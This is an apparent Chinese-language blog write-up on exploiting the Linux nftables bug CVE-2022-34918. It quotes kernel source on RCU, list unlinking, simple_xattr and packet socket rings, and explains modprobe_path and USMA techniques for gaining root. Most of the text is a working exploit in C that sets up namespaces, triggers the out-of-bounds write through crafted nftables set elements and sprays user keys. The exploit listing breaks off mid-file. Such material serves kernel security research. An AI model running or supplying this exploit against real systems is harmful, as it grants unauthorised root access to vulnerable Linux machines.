struct user_key_payload *upayload = user_key_payload_locked(key);

/* clear the quota */
key_payload_reserve(key, 0);

if (upayload) {
rcu_assign_keypointer(key, NULL);
call_rcu(&upayload->rcu, user_free_payload_rcu);
}
}

EXPORT_SYMBOL(user_revoke);

這裏會調用call_rcu

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
/*
 * Queue an RCU callback.  head->func is assigned here and the node is
 * enqueued on the current CPU's callback list; the callback only runs
 * after a full grace period, so a kernel text pointer sits inside the
 * soon-to-be-freed object for a leakable window.
 */
static void
__call_rcu(struct rcu_head *head, rcu_callback_t func)
{
unsigned long flags;
struct rcu_data *rdp;
bool was_alldone;

/* Misaligned rcu_head! */
WARN_ON_ONCE((unsigned long)head & (sizeof(void *) - 1));

if (debug_rcu_head_queue(head)) {
/*
* Probable double call_rcu(), so leak the callback.
* Use rcu:rcu_callback trace event to find the previous
* time callback was passed to __call_rcu().
*/
WARN_ONCE(1, "__call_rcu(): Double-freed CB %p->%pS()!!!\n",
head, head->func);
WRITE_ONCE(head->func, rcu_leak_callback);
return;
}
/* The leakable function pointer is stored here. */
head->func = func;
head->next = NULL;
local_irq_save(flags);
kasan_record_aux_stack(head);
rdp = this_cpu_ptr(&rcu_data);

/* Add the callback to our list. */
if (unlikely(!rcu_segcblist_is_enabled(&rdp->cblist))) {
// This can trigger due to call_rcu() from offline CPU:
WARN_ON_ONCE(rcu_scheduler_active != RCU_SCHEDULER_INACTIVE);
WARN_ON_ONCE(!rcu_is_watching());
// Very early boot, before rcu_init(). Initialize if needed
// and then drop through to queue the callback.
if (rcu_segcblist_empty(&rdp->cblist))
rcu_segcblist_init(&rdp->cblist);
}

check_cb_ovld(rdp);
if (rcu_nocb_try_bypass(rdp, head, &was_alldone, flags))
return; // Enqueued onto ->nocb_bypass, so just leave.
// If no-CBs CPU gets here, rcu_nocb_try_bypass() acquired ->nocb_lock.
rcu_segcblist_enqueue(&rdp->cblist, head);
if (__is_kvfree_rcu_offset((unsigned long)func))
trace_rcu_kvfree_callback(rcu_state.name, head,
(unsigned long)func,
rcu_segcblist_n_cbs(&rdp->cblist));
else
trace_rcu_callback(rcu_state.name, head,
rcu_segcblist_n_cbs(&rdp->cblist));

/* Go handle any RCU core processing required. */
if (IS_ENABLED(CONFIG_RCU_NOCB_CPU) &&
unlikely(rcu_segcblist_is_offloaded(&rdp->cblist))) {
__call_rcu_nocb_wake(rdp, was_alldone, flags); /* unlocks */
} else {
__call_rcu_core(rdp, head, flags);
local_irq_restore(flags);
}
}

/* Public entry point; see __call_rcu() above. */
void call_rcu(struct rcu_head *head, rcu_callback_t func)
{
__call_rcu(head, func);
}
EXPORT_SYMBOL_GPL(call_rcu);

可以看到這裏纔會對func成員賦值user_free_payload_rcu函數地址,並且眾所周知的是rcu並不會直接執行回調函數,而是會先加入到隊列中,等到所有的reader都離開了寬限期之後才能夠將舊的給釋放掉,所以我們可以直接趁此時間利用溢出的user_key_payload去越界讀取下面的內容。

CVE-2022-34918-LPE-PoC中最终get root shell的方式是通过修改modprobe_path达成的,其任意地址写的手段是利用list_del函数存在unlink操作

1
2
3
4
5
/*
 * Classic doubly-linked-list unlink: two mirrored pointer writes,
 * next->prev = prev and prev->next = next.  With a corrupted node this is
 * a write-what-where primitive — but note both targets must be mapped,
 * since each side is written to.
 */
static inline void __list_del(struct list_head * prev, struct list_head * next)
{
next->prev = prev;
WRITE_ONCE(prev->next, next);
}

这里只需要将/proc/目录修改为/tmp/即可,这样来就可以修改其目标文件了。所以我们只需要修改next低位为0x2f706d74并且prev为modprobe_path + 1即可实现修改目录为/tmp/目录的目的,不过这里的next必须为有效的地址,因为也对next做了写操作。

physmap 是内核虚拟内存的一个区域,物理内存页在其中连续映射。例如,如果机器有 4GiB(2^32 字节)内存,则需要 32 位(4 字节)来寻址系统中可用的物理内存的每个字节。假设 physmap 从 0xffffffff00000000 开始,从 0xffffffff00000000 到 0xffffffffffffffff 的任何地址都将有效,因为低 4 个字节的每个值(从 0x00000000-0xffffffff)都需要寻址内存。因此,假设系统至少有 4GiB 内存,攻击者可以为prev的低 4 字节选择任何值,只要高 4 字节对应于 physmap 地址即可。

所以next的取值就很清晰了,也就是physmap + 0x2f706d74

这里用于实现上述操作的结构体选择的是simple_xattr

1
2
3
4
5
6
/*
 * In-memory extended attribute node (tmpfs-style filesystems): a list
 * node (the unlink target), the attribute name pointer used for lookup,
 * and an inline value of user-chosen size.
 */
struct simple_xattr {
struct list_head list;
char *name;
size_t size;
char value[];
};
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
/*
 * Allocate an xattr node: header + value in one GFP_KERNEL allocation
 * whose size — and therefore slab cache — is chosen by the user-supplied
 * value size, making it a flexible grooming object.
 */
struct simple_xattr *simple_xattr_alloc(const void *value, size_t size)
{
struct simple_xattr *new_xattr;
size_t len;

/* wrap around? */
len = sizeof(*new_xattr) + size;
if (len < sizeof(*new_xattr))
return NULL;

new_xattr = kvmalloc(len, GFP_KERNEL);
if (!new_xattr)
return NULL;

new_xattr->size = size;
memcpy(new_xattr->value, value, size);
return new_xattr;
}

上述是关于simple_xattr的生成函数,可以看到其长度主要有结构体大小以及指定的value大小决定,并且其申请的标志位为GFP_KERNEL所以算是这一利用手法的最佳选择。

然后这里exp中存在一个小小的trick,因为simple_xattr是通过name进行索引的,所以这里可以直接通过溢出修改name的最后一个字节,因为前面可以看到的是name是一个char类型的指针,所以其末尾一定为0所以修改为一定偏移,那么就可以通过修改后的字符串进行索引可以直接找到被我们溢出修改掉的simple_xattr结构体。

因为我这里采用的是5.10的内核版本所以就不写上面的exp了

USMA

在以往我们简单介绍过usma,当时采用的是直接修改页表的方式来对代码段进行修改,并且在那里我们使用了packet socket模块来构建页级堆风水,不过这次在这里我们可以直接使用它来完成usma。

packet socket模块可以让用户在设备驱动层接受和发送raw packets,并且为了加速数据报文的拷贝,它允许用户创建一块与内核态共享的环形缓冲区,其具体实现函数为packet_set_ring

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
/*
 * Excerpt of the PF_PACKET setsockopt handler.  For PACKET_RX_RING /
 * PACKET_TX_RING it copies a tpacket_req (V1/V2) or tpacket_req3 (V3)
 * from userspace — size depends on po->tp_version — and hands it to
 * packet_set_ring() under the socket lock.
 */
static int
packet_setsockopt(struct socket *sock, int level, int optname, sockptr_t optval,
unsigned int optlen)
{
struct sock *sk = sock->sk;
struct packet_sock *po = pkt_sk(sk);
int ret;

if (level != SOL_PACKET)
return -ENOPROTOOPT;

switch (optname) {

// ......

case PACKET_RX_RING:
case PACKET_TX_RING:
{
union tpacket_req_u req_u;
int len;

lock_sock(sk);
switch (po->tp_version) {
case TPACKET_V1:
case TPACKET_V2:
len = sizeof(req_u.req);
break;
case TPACKET_V3:
default:
len = sizeof(req_u.req3);
break;
}
if (optlen < len) {
ret = -EINVAL;
} else {
if (copy_from_sockptr(&req_u.req, optval, len))
ret = -EFAULT;
else
ret = packet_set_ring(sk, &req_u, 0,
optname == PACKET_TX_RING);
}
release_sock(sk);
return ret;
}

// ......
}

这里会根据setopt进入到不同分支,这里选择创建一块用户态与内核态共享的环形缓冲区,即上述case中,最终走到packet_set_ring函数。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
/*
 * Excerpt: validate the user-supplied ring geometry (positive, page
 * aligned block size; sane frame size; consistent frame/block counts)
 * and then allocate the block directory via alloc_pg_vec().  The rest of
 * the function (mapping/accounting) is elided.
 */
static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
int closing, int tx_ring)
{
struct pgv *pg_vec = NULL;
struct packet_sock *po = pkt_sk(sk);
unsigned long *rx_owner_map = NULL;
int was_running, order = 0;
struct packet_ring_buffer *rb;
struct sk_buff_head *rb_queue;
__be16 num;
int err;
/* Added to avoid minimal code churn */
struct tpacket_req *req = &req_u->req;

rb = tx_ring ? &po->tx_ring : &po->rx_ring;
rb_queue = tx_ring ? &sk->sk_write_queue : &sk->sk_receive_queue;

err = -EBUSY;
if (!closing) {
if (atomic_read(&po->mapped))
goto out;
if (packet_read_pending(rb))
goto out;
}

if (req->tp_block_nr) {
unsigned int min_frame_size;

/* Sanity tests and some calculations */
err = -EBUSY;
if (unlikely(rb->pg_vec))
goto out;

switch (po->tp_version) {
case TPACKET_V1:
po->tp_hdrlen = TPACKET_HDRLEN;
break;
case TPACKET_V2:
po->tp_hdrlen = TPACKET2_HDRLEN;
break;
case TPACKET_V3:
po->tp_hdrlen = TPACKET3_HDRLEN;
break;
}

err = -EINVAL;
if (unlikely((int)req->tp_block_size <= 0))
goto out;
if (unlikely(!PAGE_ALIGNED(req->tp_block_size)))
goto out;
min_frame_size = po->tp_hdrlen + po->tp_reserve;
if (po->tp_version >= TPACKET_V3 &&
req->tp_block_size <
BLK_PLUS_PRIV((u64)req_u->req3.tp_sizeof_priv) + min_frame_size)
goto out;
if (unlikely(req->tp_frame_size < min_frame_size))
goto out;
if (unlikely(req->tp_frame_size & (TPACKET_ALIGNMENT - 1)))
goto out;

rb->frames_per_block = req->tp_block_size / req->tp_frame_size;
if (unlikely(rb->frames_per_block == 0))
goto out;
if (unlikely(rb->frames_per_block > UINT_MAX / req->tp_block_nr))
goto out;
if (unlikely((rb->frames_per_block * req->tp_block_nr) !=
req->tp_frame_nr))
goto out;

/* Allocate the per-block page directory (attack target). */
err = -ENOMEM;
order = get_order(req->tp_block_size);
pg_vec = alloc_pg_vec(req, order);
if (unlikely(!pg_vec))
goto out;
// ......
}

上述会走到alloc_pg_vec函数申请pg_vec

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
/*
 * Allocate the ring's block directory: a kcalloc'd array of tp_block_nr
 * struct pgv entries (GFP_KERNEL, user-controlled count — groomable),
 * each pointing at an order-sized page allocation.  Overwriting a
 * pgv.buffer pointer later makes packet_mmap() map an attacker-chosen
 * kernel page into userspace (USMA).
 */
static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
{
unsigned int block_nr = req->tp_block_nr;
struct pgv *pg_vec;
int i;

pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN);
if (unlikely(!pg_vec))
goto out;

for (i = 0; i < block_nr; i++) {
pg_vec[i].buffer = alloc_one_pg_vec_page(order);
if (unlikely(!pg_vec[i].buffer))
goto out_free_pgvec;
}

out:
return pg_vec;

out_free_pgvec:
free_pg_vec(pg_vec, order, block_nr);
pg_vec = NULL;
goto out;
}

这里会根据block_nr来申请对应数量的页,并最终存放在pg_vec中。

然后就是为什么其可以直接代替页表来实现usma,因为其可以直接将页映射到用户态。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
/*
 * mmap() handler for PF_PACKET rings: walks the rx/tx pg_vec arrays and
 * vm_insert_page()s every page into the caller's VMA.  The kernel virtual
 * addresses stored in pg_vec are trusted here, which is why corrupting
 * one of them suffices to map an arbitrary kernel page to userspace.
 */
static int packet_mmap(struct file *file, struct socket *sock,
struct vm_area_struct *vma)
{
struct sock *sk = sock->sk;
struct packet_sock *po = pkt_sk(sk);
unsigned long size, expected_size;
struct packet_ring_buffer *rb;
unsigned long start;
int err = -EINVAL;
int i;

if (vma->vm_pgoff)
return -EINVAL;

mutex_lock(&po->pg_vec_lock);

/* The VMA must cover both rings exactly. */
expected_size = 0;
for (rb = &po->rx_ring; rb <= &po->tx_ring; rb++) {
if (rb->pg_vec) {
expected_size += rb->pg_vec_len
* rb->pg_vec_pages
* PAGE_SIZE;
}
}

if (expected_size == 0)
goto out;

size = vma->vm_end - vma->vm_start;
if (size != expected_size)
goto out;

start = vma->vm_start;
for (rb = &po->rx_ring; rb <= &po->tx_ring; rb++) {
if (rb->pg_vec == NULL)
continue;

for (i = 0; i < rb->pg_vec_len; i++) {
struct page *page;
void *kaddr = rb->pg_vec[i].buffer;
int pg_num;

for (pg_num = 0; pg_num < rb->pg_vec_pages; pg_num++) {
/* Trusts kaddr; only validate_page_before_insert() gates it. */
page = pgv_to_page(kaddr);
err = vm_insert_page(vma, start, page);
if (unlikely(err))
goto out;
start += PAGE_SIZE;
kaddr += PAGE_SIZE;
}
}
}

atomic_inc(&po->mapped);
vma->vm_ops = &packet_mmap_ops;
err = 0;

out:
mutex_unlock(&po->pg_vec_lock);
return err;
}

这里则是通过mmap将其页面映射到用户态的函数,可以看到最终是将page插入到vma中。

1
2
3
4
5
6
7
/*
 * Gate for vm_insert_page(): reject anonymous pages, slab pages and typed
 * pages (page_has_type() covers PG_buddy/PG_offline/PG_table/PG_guard).
 * Kernel text pages pass all three checks, which is what makes mapping
 * them into userspace possible here.
 */
static int validate_page_before_insert(struct page *page)
{
if (PageAnon(page) || PageSlab(page) || page_has_type(page))
return -EINVAL;
flush_dcache_page(page);
return 0;
}

不过需要注意的是,在插入的过程中会对页面进行检测,检查page是否为匿名页,是否为Slab子系统分配的页,以及page是否含有type,而内存页的type总共有以下四种。

1
2
3
4
#define PG_buddy	0x00000080
#define PG_offline 0x00000100
#define PG_table 0x00000200
#define PG_guard 0x00000400

PG_buddy为伙伴系统中的页,PG_offline为内存交换出去的页,PG_table为用作页表的页,PG_guard为用作内存屏障的页。可以看到如果传入的page为内核代码段的页,以上的检查全都可以绕过。

所以这里可以直接通过溢出修改掉pg_vec中虚拟地址的值为__sys_setresuid函数所在的页,从而直接修改该函数,最终get root shell

综上,exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
// gcc exp.c -o exp -l mnl -l nftnl -w
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <sched.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <err.h>
#include <libmnl/libmnl.h>
#include <libnftnl/chain.h>
#include <libnftnl/expr.h>
#include <libnftnl/rule.h>
#include <libnftnl/table.h>
#include <libnftnl/set.h>
#include <linux/netfilter.h>
#include <linux/netfilter/nf_tables.h>
#include <linux/netfilter/nfnetlink.h>
#include <sched.h>
#include <sys/types.h>
#include <signal.h>
#include <net/if.h>
#include <asm/types.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/if_packet.h>
#include <linux/ethtool.h>
#include <linux/sockios.h>
#include <sys/xattr.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <assert.h>
#include <netinet/in.h>
#include <stdint.h>
#include <syscall.h>
#include <mqueue.h>
#include <linux/keyctl.h>
#include <sys/shm.h>
#include <sys/ipc.h>
#include <sys/types.h>
#include <sys/mman.h>

#define PAGE_SIZE 0x1000
#define PREFIX_BUF_LEN 0x10
#define RCU_HEAD_LEN 0x10
#define KMALLOC64_KEYLEN (64 - 8 - 12 - 16)
#define KEY_PAYLOAD_SIZE (32 + 1 - 24)
#define CORRUPT_SIZE 0x8000
#define SPRAY_KEY_CNT 150
#define FREE_HOLE_STEP 15
#define KMALLOC64_PAGE_CNT ((32 + 8) / 8)
#define PACKET_SPRAY_CNT 0x100
#define PACKET_FENGSHUI_CNT 0x100
#define PACKET_FREE_HOLE_STEP 0x10

/* Data written OOB over a freed user_key_payload object: `len` lines up with
 * the key's datalen field, so setting it to CORRUPT_SIZE makes a later
 * KEYCTL_READ return far more kernel memory than the key really holds.
 * packed: field offsets must match the kernel object layout exactly. */
struct leak_payload
{
uint8_t prefix[PREFIX_BUF_LEN];
uint8_t rcu_buf[RCU_HEAD_LEN]; /* overlays the object's rcu_head */
uint16_t len; /* overlays datalen; set to CORRUPT_SIZE in main() */
} __attribute__((packed));

/* Data written OOB over an AF_PACKET pg_vec page-pointer array: `pg_vec`
 * replaces a page pointer so that mmap()ing the ring maps an attacker-chosen
 * kernel physmap address into userspace (see the search loop in main()). */
struct write_payload
{
uint8_t prefix[PREFIX_BUF_LEN];
void *pg_vec; /* kernel address to expose via mmap */
} __attribute__((packed));

/*
 * Hex-dump `size` bytes of `buf` as qword pairs, two per row, with a
 * left-aligned row number (padded with a trailing space below 100).
 */
void print_hex(char *buf, int size)
{
    int qwords = size / 8;

    puts("======================================");
    printf("data :\n");

    for (int idx = 0; idx < qwords; idx++)
    {
        /* row label on the first qword of each pair */
        if (idx % 2 == 0)
        {
            int row = idx / 2;
            if (row < 100)
                printf("%d ", row);
            else
                printf("%d", row);
        }

        printf(" %16llx", *(size_t *)(buf + idx * 8));

        /* newline after the second qword of each pair */
        if (idx % 2 == 1)
            printf("\n");
    }

    puts("======================================");
}

/*
 * Enter fresh user + mount + network namespaces and map the caller's
 * uid/gid to root inside them, so nftables netlink is reachable without
 * real privileges.  Exits via err(3) on any failure — the original left
 * unshare()/open()/write() unchecked, so a failed setup silently broke
 * every later step.
 */
void unshare_setup(uid_t uid, gid_t gid)
{
    int temp;
    char edit[0x100];

    if (unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET) < 0)
        err(1, "unshare");

    /* must deny setgroups before gid_map may be written */
    temp = open("/proc/self/setgroups", O_WRONLY);
    if (temp < 0)
        err(1, "open setgroups");
    if (write(temp, "deny", strlen("deny")) != (ssize_t)strlen("deny"))
        err(1, "write setgroups");
    close(temp);

    /* map uid -> 0 inside the new user namespace */
    temp = open("/proc/self/uid_map", O_WRONLY);
    if (temp < 0)
        err(1, "open uid_map");
    snprintf(edit, sizeof(edit), "0 %d 1", uid);
    if (write(temp, edit, strlen(edit)) != (ssize_t)strlen(edit))
        err(1, "write uid_map");
    close(temp);

    /* map gid -> 0 inside the new user namespace */
    temp = open("/proc/self/gid_map", O_WRONLY);
    if (temp < 0)
        err(1, "open gid_map");
    snprintf(edit, sizeof(edit), "0 %d 1", gid);
    if (write(temp, edit, strlen(edit)) != (ssize_t)strlen(edit))
        err(1, "write gid_map");
    close(temp);

    return;
}

/*
 * Pin `pid` (0 = calling thread) to CPU `cpu_n`, so the heap spray and the
 * vulnerable allocation happen on the same per-CPU slab. Fatal on failure.
 */
void set_cpu_affinity(int cpu_n, pid_t pid)
{
    cpu_set_t mask;

    CPU_ZERO(&mask);
    CPU_SET(cpu_n, &mask);

    if (sched_setaffinity(pid, sizeof(mask), &mask) < 0)
        err(1, "sched_setaffinity");
}

/*
 * Create an empty NFPROTO_IPV4 nftables table called `name` by sending one
 * begin/NEWTABLE/end netlink batch over `nl`.  Fatal (err) on any failure.
 *
 * Fixes vs. original: the nl NULL check now runs before any work instead of
 * after the batch was already built; the nftnl_table allocation is checked
 * and freed (it leaked before); dead locals (exprs/exprid/table_seq) removed.
 */
void create_table(struct mnl_socket *nl, const char *name)
{
    uint8_t family = NFPROTO_IPV4;
    char buf[MNL_SOCKET_BUFFER_SIZE * 2];
    struct mnl_nlmsg_batch *batch;
    struct nftnl_table *table;
    struct nlmsghdr *nlh;
    int seq = 0;

    if (nl == NULL)
        err(1, "mnl_socket_open");

    table = nftnl_table_alloc();
    if (table == NULL)
        err(1, "nftnl_table_alloc");
    nftnl_table_set_str(table, NFTNL_TABLE_NAME, name);
    nftnl_table_set_u32(table, NFTNL_TABLE_FLAGS, 0);

    batch = mnl_nlmsg_batch_start(buf, sizeof(buf));

    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    nlh = nftnl_table_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
            NFT_MSG_NEWTABLE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
    nftnl_table_nlmsg_build_payload(nlh, table);
    nftnl_table_free(table); /* serialized into the batch; no longer needed */
    mnl_nlmsg_batch_next(batch);

    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    printf("[+] new table %s\n", name);
    if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
            mnl_nlmsg_batch_size(batch)) < 0)
    {
        err(1, "mnl_socket_send");
    }
}

/*
 * Create an nftables map (NFT_SET_MAP) named `name` in `table_name` with the
 * given key/data lengths and data type, committed as one netlink batch.
 * The declared data_type/data_len is what the CVE-2022-34918 element later
 * confuses with a verdict.  Fatal (err) on any failure.
 *
 * Fixes vs. original: nl NULL check moved before any work; nftnl_set_alloc
 * result checked; dead locals (exprs/exprid) removed.
 */
void create_set(struct mnl_socket *nl, const char *name, int key_len, int data_len, int data_type, char *table_name, int id)
{
    uint8_t family = NFPROTO_IPV4;
    char buf[MNL_SOCKET_BUFFER_SIZE * 2];
    struct mnl_nlmsg_batch *batch;
    struct nftnl_set *set_stable;
    struct nlmsghdr *nlh;
    int seq = 0;

    if (nl == NULL)
        err(1, "mnl_socket_open");

    set_stable = nftnl_set_alloc();
    if (set_stable == NULL)
        err(1, "nftnl_set_alloc");
    nftnl_set_set_str(set_stable, NFTNL_SET_TABLE, table_name);
    nftnl_set_set_str(set_stable, NFTNL_SET_NAME, name);
    nftnl_set_set_u32(set_stable, NFTNL_SET_KEY_LEN, key_len);
    nftnl_set_set_u32(set_stable, NFTNL_SET_DATA_LEN, data_len);
    nftnl_set_set_u32(set_stable, NFTNL_SET_DATA_TYPE, data_type);
    nftnl_set_set_u32(set_stable, NFTNL_SET_FLAGS, NFT_SET_MAP);
    nftnl_set_set_u32(set_stable, NFTNL_SET_FAMILY, family);
    nftnl_set_set_u32(set_stable, NFTNL_SET_ID, id);

    batch = mnl_nlmsg_batch_start(buf, sizeof(buf));

    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    nlh = nftnl_set_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
            NFT_MSG_NEWSET, family,
            NLM_F_CREATE | NLM_F_ACK, seq++);
    nftnl_set_nlmsg_build_payload(nlh, set_stable);
    nftnl_set_free(set_stable);
    mnl_nlmsg_batch_next(batch);

    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    printf("[+] setting stable %s and set\n", name);
    if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
            mnl_nlmsg_batch_size(batch)) < 0)
    {
        err(1, "mnl_socket_send");
    }
}

/*
 * Add two elements sharing the same key to `set_name` and commit them in one
 * batch.  The second element supplies a 4-byte NFT_SET_ELEM_VERDICT to a set
 * that was created with NFT_DATA_VALUE data — the CVE-2022-34918 type
 * confusion that produces the kernel out-of-bounds write of `data_buf`.
 *
 * Fixes vs. original: nl NULL check moved before any work; allocation
 * results checked.
 */
void create_setelem(struct mnl_socket *nl, char *key_buf, int key_len, char *data_buf, int data_len, char *set_name, char *table_name, int id)
{
    uint8_t family = NFPROTO_IPV4;
    char buf[MNL_SOCKET_BUFFER_SIZE * 2];
    struct mnl_nlmsg_batch *batch;
    struct nlmsghdr *nlh;
    int seq = 0;

    if (nl == NULL)
        err(1, "mnl_socket_open");

    struct nftnl_set *set_stable = nftnl_set_alloc();
    if (set_stable == NULL)
        err(1, "nftnl_set_alloc");
    nftnl_set_set_str(set_stable, NFTNL_SET_TABLE, table_name);
    nftnl_set_set_str(set_stable, NFTNL_SET_NAME, set_name);
    nftnl_set_set_u32(set_stable, NFTNL_SET_ID, id);

    /* well-formed element: key + value data matching the set's declaration */
    struct nftnl_set_elem *element = nftnl_set_elem_alloc();
    if (element == NULL)
        err(1, "nftnl_set_elem_alloc");
    nftnl_set_elem_set(element, NFTNL_SET_ELEM_KEY, key_buf, key_len);
    nftnl_set_elem_set(element, NFTNL_SET_ELEM_DATA, data_buf, data_len);

    /* confused element: a verdict on a value map — this triggers the bug */
    struct nftnl_set_elem *element2 = nftnl_set_elem_alloc();
    if (element2 == NULL)
        err(1, "nftnl_set_elem_alloc");
    int verdict = NFT_CONTINUE;
    nftnl_set_elem_set(element2, NFTNL_SET_ELEM_KEY, key_buf, key_len);
    nftnl_set_elem_set(element2, NFTNL_SET_ELEM_VERDICT, &verdict, 4);

    /* ownership of both elements transfers to set_stable */
    nftnl_set_elem_add(set_stable, element);
    nftnl_set_elem_add(set_stable, element2);

    batch = mnl_nlmsg_batch_start(buf, sizeof(buf));

    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
            NFT_MSG_NEWSETELEM, family,
            NLM_F_CREATE | NLM_F_EXCL | NLM_F_ACK,
            seq++);
    nftnl_set_elems_nlmsg_build_payload(nlh, set_stable);
    nftnl_set_free(set_stable); /* frees the attached elements too */
    mnl_nlmsg_batch_next(batch);

    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    printf("[+] setting set_elem down\n");
    if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
            mnl_nlmsg_batch_size(batch)) < 0)
    {
        err(1, "mnl_socket_send");
    }
}

/* Raw add_key(2) syscall wrapper — avoids a libkeyutils dependency. */
static inline int add_key(const char *type, const char *description, const void *payload, size_t plen, int ringid)
{
    long ret = syscall(__NR_add_key, type, description, payload, plen, ringid);
    return (int)ret;
}

/* Raw keyctl(2) syscall wrapper — avoids a libkeyutils dependency. */
static inline long keyctl(int operation, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5)
{
    long ret = syscall(__NR_keyctl, operation, arg2, arg3, arg4, arg5);
    return ret;
}

/*
 * Spray `spray_size` "user" keys ('A'-filled payloads of KEY_PAYLOAD_SIZE)
 * into the process keyring, recording their ids in `id_buffer`.  Each
 * add_key is retried up to 3 times (key quota can be transiently full).
 *
 * Fix vs. original: a permanent add_key failure used printf + exit(0),
 * reporting success on failure and losing errno; now err(1, ...) exits
 * non-zero with the proper strerror text and a newline.
 */
void spray_keyring(int *id_buffer, uint32_t spray_size)
{
    char key_desc[0x20];
    char key_payload[KEY_PAYLOAD_SIZE + 1] = {0};

    for (uint32_t i = 0; i < spray_size; i++)
    {
        snprintf(key_desc, sizeof(key_desc), "spray_key_%d", i);
        memset(key_payload, 'A', KEY_PAYLOAD_SIZE);
        for (int j = 0; j < 3; j++)
        {
            id_buffer[i] = add_key("user", key_desc, key_payload, strlen(key_payload),
                    KEY_SPEC_PROCESS_KEYRING);
            if (id_buffer[i] < 0)
                usleep(100 * 1000); /* brief back-off before retrying */
            else
                break;
        }

        if (id_buffer[i] < 0)
            err(1, "add_key %d", i);
    }
}

/*
 * Scan the sprayed keys: a key whose KEYCTL_READ returns exactly
 * CORRUPT_SIZE had its datalen overwritten by the OOB write.  On a hit,
 * stores the key id in *corrupted_key_id and returns 1; otherwise 0.
 * Slots holding 0 (already released) are skipped.
 *
 * Fixes vs. original: the 0x8000-byte scratch buffer lived on the stack
 * (risking overflow) — moved to the heap; err() already appends
 * strerror(errno), so the redundant ": %m" was dropped.
 */
